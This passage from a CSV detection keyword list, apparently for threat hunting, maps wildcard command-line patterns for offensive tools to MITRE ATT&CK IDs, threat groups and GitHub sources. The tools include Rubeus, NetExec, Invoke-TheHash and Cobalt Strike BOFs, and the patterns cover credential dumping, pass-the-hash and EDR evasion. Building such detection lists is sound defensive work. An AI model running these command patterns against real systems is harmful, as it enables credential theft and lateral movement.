tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-slaac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-wordlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-sniffer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --target-user * --dc-ip * -command *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"* tdotnet publish Athena *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"* telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tgssub * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgtdeleg /nowrap*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* tgtdeleg /spn:cifs*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"* tgtdeleg /target:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* thc-hidra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"* theHarvester.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"* --threads * scan --buckets-file* ","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* ticketsplease.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"* TikiLoader*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"* tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tls-nextprotoneg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tls-ticketbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tn3270-screen.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* TokenStrip.c *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"* TokenStripBOF.o *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"* tokenvator *","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"* -Tokenvator -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --tor-port*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --tor-type*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --transformer donut*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer Loader*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --transformer sRDI*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* TSCHRPCAttack*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* --type asreproast*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"* --type search-spn*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -type user -search * -DomainController * -Credential * -list yes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"* -u * --local-auth*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --lusers*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * -M handlekatz*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M nanodump*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M ntdsutil*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 